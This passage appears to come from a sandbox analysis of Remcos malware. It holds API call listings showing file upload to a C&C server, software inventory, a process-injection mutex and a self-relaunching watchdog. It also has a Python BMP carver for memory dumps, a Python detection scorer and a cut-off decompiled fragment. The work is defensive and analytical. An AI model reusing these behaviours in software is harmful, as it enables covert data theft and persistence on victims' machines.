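    if hdr_size != INFO_HEADER_LEN or planes != 1 or bpp not in (1, 4, 8, 16, 24, 32):
        raise ValueError(f"unexpected info header (size={hdr_size}, planes={planes}, bpp={bpp})")
    if compression != 0:
        # Assumption: a CreateCompatibleBitmap grab is written as BI_RGB (uncompressed).
        raise ValueError(f"unsupported compression {compression}")
    bits_len = row_stride(width, bpp) * abs(height)
    if off_bits < FILE_HEADER_LEN + INFO_HEADER_LEN or off_bits + bits_len > len(blob):
        raise ValueError("pixel data truncated")
    return {"width": abs(width), "height": abs(height), "bpp": bpp,
            "bottom_up": height > 0, "declared_size": file_size,
            "total_len": off_bits + bits_len}


def carve_bmps(buf):
    """Scan an arbitrary buffer (memory dump, reassembled C2 stream) for complete
    BMP images and return [(offset, geometry), ...]; false 'BM' hits are skipped."""
    found, pos = [], buf.find(BMP_MAGIC)
    while pos != -1:
        try:
            geo = parse_bmp(buf[pos:])
        except ValueError:
            pos = buf.find(BMP_MAGIC, pos + 1)
            continue
        found.append((pos, geo))
        pos = buf.find(BMP_MAGIC, pos + geo["total_len"])
    return found


if __name__ == "__main__":
    sample = b"junk " + build_bmp(640, 480) + b"\x00" * 3 + build_bmp(16, 16, 32)
    for off, geo in carve_bmps(sample):
        print(f"BMP at {off}: {geo['width']}x{geo['height']}x{geo['bpp']} ({geo['total_len']} bytes)")
```

parse_bmp deliberately rejects anything that does not match the fixed 14 + 40 byte layout the routine produces, so a carve over a dump stays tight; loosen the header-size check if you also want BITMAPV4/V5 images from other sources.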

                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                        • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                        • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                        • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                        • String ID: Uploading file to C&C: $[INFO]
                                        • API String ID: 368904453-3151135581
                                        • Opcode ID: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                        • Opcode Fuzzy Hash: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                        • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1820998543-3714951968
                                        • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                        • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                        • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                        • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                        • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                        • wcslen.MSVCRT ref: 00409C25
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                        • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                        • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                        • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                        • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                        • API String ID: 2459104678-694575909
                                        • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                        • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • exit.MSVCRT ref: 0040A97F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                        • exit.MSVCRT ref: 0040A9A9
                                        • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                        • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                        • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                        • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                        • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                        • exit.MSVCRT ref: 0040AB2A
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                        • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DA4
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DBE
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DC8
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DE8
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E02
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E0C
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407E2C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 2802067201-3088914985
                                        • Opcode ID: b6e4201a0bc2d300c2b01fb888cc1e4db450f4ca7ef8c4092e0438d00c3ee3fc
                                        • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                        • Opcode Fuzzy Hash: b6e4201a0bc2d300c2b01fb888cc1e4db450f4ca7ef8c4092e0438d00c3ee3fc
                                        • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%
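Three of the routines above leave host-side traces that can be scored together: the injection routine creates the mutex "Remcos_Mutex_Inj" before OpenProcess; the watchdog ("WDH") reads an "exepath" registry value under HKCU, drops a copy through GetTempPathW + GetTempFileNameW with prefix "temp_" and appends ".exe" (so the file name ends in temp_XXXX.tmp.exe) and launches it with ShellExecuteW "open"; and the inventory routine walks HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall. The following Python is an added example, not part of the report or the sample: the event schema and the sample events are constructed, the weights and threshold are assumptions to tune, and mutex creation is only visible in API-trace or EDR telemetry (Sysmon does not log it), so that indicator is optional.

```python
import re
from collections import defaultdict

# Observables lifted from the call listings (case-insensitive where paths are involved).
INJ_MUTEX = "Remcos_Mutex_Inj"                     # CreateMutexA argument in the "Inj" routine
WATCHDOG_REG_VALUE = "exepath"                     # value name used by the watchdog
UNINSTALL_KEY = r"software\microsoft\windows\currentversion\uninstall"
# GetTempFileNameW(path, "temp_", 0, out) yields <temp>\temp_<hex>.tmp; lstrcatW adds ".exe".
TEMP_DROP_RE = re.compile(r"\\temp_[0-9a-f]{1,4}\.tmp\.exe$", re.I)

# Assumed weights: the mutex string alone is decisive, the rest add up.
WEIGHTS = {
    "remcos_inj_mutex": 100,
    "exepath_value": 30,
    "temp_tmp_exe_exec": 35,
    "temp_tmp_exe_drop": 25,
    "uninstall_enum": 10,   # benign inventory tools do this too, so it only nudges
}


def classify_event(ev):
    """Map one constructed telemetry record to an indicator name, or None.
    Record shape: {"pid": int, "type": str, plus "name"/"value"/"path"/"key"}."""
    t = ev["type"]
    if t == "mutex_create" and ev.get("name") == INJ_MUTEX:
        return "remcos_inj_mutex"
    if t in ("reg_set", "reg_query") and ev.get("value", "").lower() == WATCHDOG_REG_VALUE:
        return "exepath_value"
    if t in ("file_create", "process_create") and TEMP_DROP_RE.search(ev.get("path", "")):
        return "temp_tmp_exe_exec" if t == "process_create" else "temp_tmp_exe_drop"
    if t == "reg_open" and ev.get("key", "").lower().endswith(UNINSTALL_KEY):
        return "uninstall_enum"
    return None


def score_by_pid(events):
    """Aggregate distinct indicators per pid: {pid: (score, [indicators])}."""
    hits = defaultdict(set)
    for ev in events:
        ind = classify_event(ev)
        if ind:
            hits[ev["pid"]].add(ind)
    return {pid: (sum(WEIGHTS[i] for i in inds), sorted(inds)) for pid, inds in hits.items()}


def verdicts(events, threshold=60):
    """True for every pid whose combined indicator weight reaches the threshold."""
    return {pid: score >= threshold for pid, (score, _) in score_by_pid(events).items()}


# Constructed sample telemetry: pid 4242 behaves like the listings, pid 777 is a benign inventory tool.
SAMPLE_EVENTS = [
    {"pid": 4242, "type": "reg_query", "key": r"HKCU\Software\<name>", "value": "exepath"},
    {"pid": 4242, "type": "file_create", "path": r"C:\Users\user\AppData\Local\Temp\temp_1A2B.tmp.exe"},
    {"pid": 4242, "type": "process_create", "path": r"C:\Users\user\AppData\Local\Temp\temp_1A2B.tmp.exe"},
    {"pid": 4242, "type": "mutex_create", "name": "Remcos_Mutex_Inj"},
    {"pid": 777, "type": "process_create", "path": r"C:\Windows\System32\notepad.exe"},
    {"pid": 777, "type": "reg_open", "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall"},
]

if __name__ == "__main__":
    for pid, (score, inds) in score_by_pid(SAMPLE_EVENTS).items():
        print(pid, score, inds, "ALERT" if verdicts(SAMPLE_EVENTS)[pid] else "ok")
```

Without the mutex event the watchdog chain alone (exepath read, temp_*.tmp.exe drop and execution) still scores 90 under these weights, which is the point of scoring per pid rather than alerting on any single call.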

                                        C-Code - Quality: 25%
                                        			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
                                        				char _v20;
                                        				char _v36;
                                        				char _v52;
                                        				char _v68;
                                        				char _v84;
                                        				char _v88;
                                        				char* _t35;
                                        				char* _t36;
                                        				char* _t37;
                                        				WCHAR* _t38;
                                        				void* _t43;
                                        				void* _t47;
                                        				intOrPtr* _t50;
                                        				intOrPtr _t78;
                                        				intOrPtr _t79;
                                        				intOrPtr _t86;
                                        				intOrPtr _t87;
                                        				intOrPtr* _t88;
                                        				void* _t91;
                                        
                                        				_t30 = __eax;
                                        				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
                                        				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t30 = E004135DE();
                                        					_t91 = _t91 + 0xc;
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				if(_t30 <= 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					if(PathFileExistsW(_t30) != 0) {
                                        						goto L4;
                                        					} else {
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
                                        					}
                                        				} else {
